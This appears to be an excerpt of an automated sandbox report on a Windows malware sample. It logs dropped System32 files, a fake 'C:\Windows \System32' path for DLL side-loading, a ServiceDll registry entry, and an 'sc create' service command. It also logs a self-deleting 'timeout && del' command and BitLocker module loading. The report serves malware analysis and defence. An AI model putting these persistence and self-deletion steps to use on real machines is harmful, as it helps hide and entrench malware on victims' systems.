Source: Binary string: ucrtbased.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA377B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,42_2_00007FFDA377B470
Source: pyld611114.exeStatic PE information: section name: .fptable
Source: usvcinsta64.exe.0.drStatic PE information: section name: .fptable
Source: printui.dll.12.drStatic PE information: section name: .fptable
Source: libiconv-2.dll.27.drStatic PE information: section name: .xdata
Source: libiconv-2.dll.27.drStatic PE information: section name: /4
Source: libiconv-2.dll.27.drStatic PE information: section name: /19
Source: libiconv-2.dll.27.drStatic PE information: section name: /31
Source: libiconv-2.dll.27.drStatic PE information: section name: /45
Source: libiconv-2.dll.27.drStatic PE information: section name: /57
Source: libiconv-2.dll.27.drStatic PE information: section name: /70
Source: libiconv-2.dll.27.drStatic PE information: section name: /81
Source: libiconv-2.dll.27.drStatic PE information: section name: /92
Source: libintl-9.dll.27.drStatic PE information: section name: .xdata
Source: libintl-9.dll.27.drStatic PE information: section name: /4
Source: libintl-9.dll.27.drStatic PE information: section name: /19
Source: libintl-9.dll.27.drStatic PE information: section name: /31
Source: libintl-9.dll.27.drStatic PE information: section name: /45
Source: libintl-9.dll.27.drStatic PE information: section name: /57
Source: libintl-9.dll.27.drStatic PE information: section name: /70
Source: libintl-9.dll.27.drStatic PE information: section name: /81
Source: libintl-9.dll.27.drStatic PE information: section name: /92
Source: libwinpthread-1.dll.27.drStatic PE information: section name: .xdata
Source: console_zero.exe.27.drStatic PE information: section name: .fptable
Source: vcruntime140d.dll.27.drStatic PE information: section name: _RDATA
Source: x816796.dat.27.drStatic PE information: section name: .fptable
Source: C:\Windows\System32\svchost.exeCode function: 42_2_649487B2 push r11; ret 42_2_649487ED
Source: C:\Windows\System32\svchost.exeCode function: 42_2_660224A8 push rax; retf 42_2_660224B1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829984B push 00000000h; retf 42_2_68299850
Source: C:\Windows\System32\svchost.exeCode function: 42_2_682970AC push rax; iretd 42_2_682970AD
Source: C:\Windows\System32\svchost.exeCode function: 42_2_682951B2 push rdx; retn 0000h42_2_682951B3
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829998B push 00000000h; ret 42_2_68299990
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829999B push 00000000h; iretd 42_2_682999A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829AA73 push 00000000h; ret 42_2_6829AA78
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829ABBB push 00000000h; retf 42_2_6829ABC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829ABB3 push 00000000h; ret 42_2_6829ABB8
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829A7AB push 00000000h; iretd 42_2_6829A7B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C2D0 push 680001C2h; retn 0001h42_2_00007FFDA361C2D5
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C2C8 push 680001C2h; retn 0001h42_2_00007FFDA361C2CD
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C2B8 push 050001C2h; retn 0001h42_2_00007FFDA361C2C5

Persistence and Installation Behavior

barindex
Creates a Windows Service pointing to an executable in C:\Windows
Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x816796\Parameters ServiceDll C:\Windows\System32\x816796.dat
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\usvcinsta64.exeJump to behavior
Source: C:\Windows\System32\cmd.exeExecutable created and started: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exeJump to behavior
Source: C:\Users\user\Desktop\pyld611114.exeFile created: C:\Windows\System32\usvcinsta64.exeJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x816796.datJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
Source: C:\Users\user\Desktop\pyld611114.exeFile created: C:\Windows\System32\usvcinsta64.exeJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x816796.datJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x816796\Parameters
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
